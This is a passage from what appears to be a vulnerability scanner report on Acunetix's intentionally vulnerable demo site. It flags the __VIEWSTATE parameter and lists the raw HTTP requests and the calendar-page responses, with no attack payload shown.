style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8184')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8185')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8186')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8187')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8188')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8189')" style="color:Black" title="June 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8190')" style="color:Black" title="June 04">4</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1163 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,163 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8160&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABYkFK9oIHgJTRBYBBgBArDIqLtoIZGRk%2B9LrLPkyx86qRomarVABS5e5mXg%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwK2xKraDwK645OfAwK746uPDAL7pOHDAgL7pOHDAgLcy%2FPoBQLcy%2FPoBQLcy%2BePDQLcy%2BePDQLcy5uiBgLcy5uiBgLcy4%2F5DwLcy4%2F5DwLcy6OcBwLcy6OcBwLcy9cwAtzL1zAC3MvL1wkC3MvL1wkC3Mv%2F6gIC3Mv%2F6gIC3MvT0w8C3MvT0w8C3MvH9ggC3MvH9ggCsdLRnwoCsdLRnwoCsdLFsgMCsdLFsgMCsdL5yQwCsdL5yQwCsdLt7AUCsdLt7AUCsdKBgw0CsdKBgw0CsdK1pgYCsdK1pgYCsdKp%2FQ8CsdKp%2FQ8CsdLdkQcCsdLdkQcCsdKx%2BQUCsdKx%2BQUCsdKlnA0CsdKlnA0Civm3BQKK%2BbcFAor5q9gJAor5q9gJAor53%2FwCAor53%2FwCAor585MKAor585MKAor557YDAor557YDAor5m80MAor5m80MAor5j%2BAFAor5j%2BAFAor5o4cNAor5o4cNAor5l%2BwLAor5l%2BwLAor5i4MDAor5i4MDAr%2BT98QJAr%2BT98QJAr%2BT65sBAr%2BT65sBAr%2BTn74KAr%2BTn74KAr%2BTs9UDAr%2BTs9UDAr%2BTp%2BgMAr%2BTp%2BgMAr%2BT24wEAr%2BT24wEAr%2BTz6MNAr%2BTz6MNAr%2BT48YGAr%2BT48YGAr%2BT168DAr%2BT168DAr%2BTy8IMAr%2BTy8IMApC61esPApC61esPwJlq4HHnmMEXboVgbEKkwTv8k3o%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:09:38 GMT Content-Length: 12431
Response Body - size: 12,431 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABYkFK9oIHgJTRBYBBgBArDIqLtoIZGRk+9LrLPkyx86qRomarVABS5e5mXg=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwK2xKraDwK645OfAwK746uPDAL7pOHDAgL7pOHDAgLcy/PoBQLcy/PoBQLcy+ePDQLcy+ePDQLcy5uiBgLcy5uiBgLcy4/5DwLcy4/5DwLcy6OcBwLcy6OcBwLcy9cwAtzL1zAC3MvL1wkC3MvL1wkC3Mv/6gIC3Mv/6gIC3MvT0w8C3MvT0w8C3MvH9ggC3MvH9ggCsdLRnwoCsdLRnwoCsdLFsgMCsdLFsgMCsdL5yQwCsdL5yQwCsdLt7AUCsdLt7AUCsdKBgw0CsdKBgw0CsdK1pgYCsdK1pgYCsdKp/Q8CsdKp/Q8CsdLdkQcCsdLdkQcCsdKx+QUCsdKx+QUCsdKlnA0CsdKlnA0Civm3BQKK+bcFAor5q9gJAor5q9gJAor53/wCAor53/wCAor585MKAor585MKAor557YDAor557YDAor5m80MAor5m80MAor5j+AFAor5j+AFAor5o4cNAor5o4cNAor5l+wLAor5l+wLAor5i4MDAor5i4MDAr+T98QJAr+T98QJAr+T65sBAr+T65sBAr+Tn74KAr+Tn74KAr+Ts9UDAr+Ts9UDAr+Tp+gMAr+Tp+gMAr+T24wEAr+T24wEAr+Tz6MNAr+Tz6MNAr+T48YGAr+T48YGAr+T168DAr+T168DAr+Ty8IMAr+Ty8IMApC61esPApC61esPwJlq4HHnmMEXboVgbEKkwTv8k3o=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8126')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">May 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8149')" style="color:Black" title="April 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8150')" style="color:Black" title="April 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8151')" style="color:Black" title="April 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8152')" style="color:Black" title="April 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8153')" style="color:Black" title="April 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8154')" style="color:Black" title="April 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8155')" style="color:Black" title="April 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8156')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8157')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8158')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8159')" style="color:Black" title="May 04">4</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8160')" style="color:White" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8161')" style="color:Black" title="May 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8162')" style="color:Black" title="May 07">7</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8163')" style="color:Black" title="May 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8164')" style="color:Black" title="May 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8165')" style="color:Black" title="May 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8166')" style="color:Black" title="May 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8167')" style="color:Black" title="May 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8168')" style="color:Black" title="May 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8169')" style="color:Black" title="May 14">14</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8170')" style="color:Black" title="May 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8171')" style="color:Black" title="May 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8172')" style="color:Black" title="May 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8173')" style="color:Black" title="May 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8174')" style="color:Black" title="May 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8175')" style="color:Black" title="May 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8176')" style="color:Black" title="May 21">21</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8177')" style="color:Black" title="May 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8178')" style="color:Black" title="May 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8179')" style="color:Black" title="May 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8180')" style="color:Black" title="May 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8181')" style="color:Black" title="May 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8182')" style="color:Black" title="May 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8183')" style="color:Black" title="May 28">28</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8184')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8185')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8186')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8187')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8188')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8189')" style="color:Black" title="June 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8190')" style="color:Black" title="June 04">4</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1167 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,167 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8164&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABYkFK9oIHgJTRBYBBgBAU9xOMdoIZGRkB1%2Frx97VZT7xEv6u4mntbLO8aLE%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKKof7jBQK645OfAwK746uPDAL7pOHDAgL7pOHDAgLcy%2FPoBQLcy%2FPoBQLcy%2BePDQLcy%2BePDQLcy5uiBgLcy5uiBgLcy4%2F5DwLcy4%2F5DwLcy6OcBwLcy6OcBwLcy9cwAtzL1zAC3MvL1wkC3MvL1wkC3Mv%2F6gIC3Mv%2F6gIC3MvT0w8C3MvT0w8C3MvH9ggC3MvH9ggCsdLRnwoCsdLRnwoCsdLFsgMCsdLFsgMCsdL5yQwCsdL5yQwCsdLt7AUCsdLt7AUCsdKBgw0CsdKBgw0CsdK1pgYCsdK1pgYCsdKp%2FQ8CsdKp%2FQ8CsdLdkQcCsdLdkQcCsdKx%2BQUCsdKx%2BQUCsdKlnA0CsdKlnA0Civm3BQKK%2BbcFAor5q9gJAor5q9gJAor53%2FwCAor53%2FwCAor585MKAor585MKAor557YDAor557YDAor5m80MAor5m80MAor5j%2BAFAor5j%2BAFAor5o4cNAor5o4cNAor5l%2BwLAor5l%2BwLAor5i4MDAor5i4MDAr%2BT98QJAr%2BT98QJAr%2BT65sBAr%2BT65sBAr%2BTn74KAr%2BTn74KAr%2BTs9UDAr%2BTs9UDAr%2BTp%2BgMAr%2BTp%2BgMAr%2BT24wEAr%2BT24wEAr%2BTz6MNAr%2BTz6MNAr%2BT48YGAr%2BT48YGAr%2BT168DAr%2BT168DAr%2BTy8IMAr%2BTy8IMApC61esPApC61esPWGfizG4M7S8CBYOBi%2B1O%2FSljmUI%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:21:18 GMT Content-Length: 12431
Response Body - size: 12,431 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABYkFK9oIHgJTRBYBBgBAU9xOMdoIZGRkB1/rx97VZT7xEv6u4mntbLO8aLE=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKKof7jBQK645OfAwK746uPDAL7pOHDAgL7pOHDAgLcy/PoBQLcy/PoBQLcy+ePDQLcy+ePDQLcy5uiBgLcy5uiBgLcy4/5DwLcy4/5DwLcy6OcBwLcy6OcBwLcy9cwAtzL1zAC3MvL1wkC3MvL1wkC3Mv/6gIC3Mv/6gIC3MvT0w8C3MvT0w8C3MvH9ggC3MvH9ggCsdLRnwoCsdLRnwoCsdLFsgMCsdLFsgMCsdL5yQwCsdL5yQwCsdLt7AUCsdLt7AUCsdKBgw0CsdKBgw0CsdK1pgYCsdK1pgYCsdKp/Q8CsdKp/Q8CsdLdkQcCsdLdkQcCsdKx+QUCsdKx+QUCsdKlnA0CsdKlnA0Civm3BQKK+bcFAor5q9gJAor5q9gJAor53/wCAor53/wCAor585MKAor585MKAor557YDAor557YDAor5m80MAor5m80MAor5j+AFAor5j+AFAor5o4cNAor5o4cNAor5l+wLAor5l+wLAor5i4MDAor5i4MDAr+T98QJAr+T98QJAr+T65sBAr+T65sBAr+Tn74KAr+Tn74KAr+Ts9UDAr+Ts9UDAr+Tp+gMAr+Tp+gMAr+T24wEAr+T24wEAr+Tz6MNAr+Tz6MNAr+T48YGAr+T48YGAr+T168DAr+T168DAr+Ty8IMAr+Ty8IMApC61esPApC61esPWGfizG4M7S8CBYOBi+1O/SljmUI=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8126')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">May 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8149')" style="color:Black" title="April 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8150')" style="color:Black" title="April 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8151')" style="color:Black" title="April 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8152')" style="color:Black" title="April 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8153')" style="color:Black" title="April 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8154')" style="color:Black" title="April 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8155')" style="color:Black" title="April 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8156')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8157')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8158')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8159')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8160')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8161')" style="color:Black" title="May 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8162')" style="color:Black" title="May 07">7</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8163')" style="color:Black" title="May 08">8</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8164')" style="color:White" title="May 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8165')" style="color:Black" title="May 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8166')" style="color:Black" title="May 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8167')" style="color:Black" title="May 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8168')" style="color:Black" title="May 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8169')" style="color:Black" title="May 14">14</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8170')" style="color:Black" title="May 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8171')" style="color:Black" title="May 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8172')" style="color:Black" title="May 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8173')" style="color:Black" title="May 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8174')" style="color:Black" title="May 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8175')" style="color:Black" title="May 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8176')" style="color:Black" title="May 21">21</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8177')" style="color:Black" title="May 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8178')" style="color:Black" title="May 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8179')" style="color:Black" title="May 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8180')" style="color:Black" title="May 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8181')" style="color:Black" title="May 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8182')" style="color:Black" title="May 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8183')" style="color:Black" title="May 28">28</a></td></tr><tr><td align="center" style="width:14%;"><a 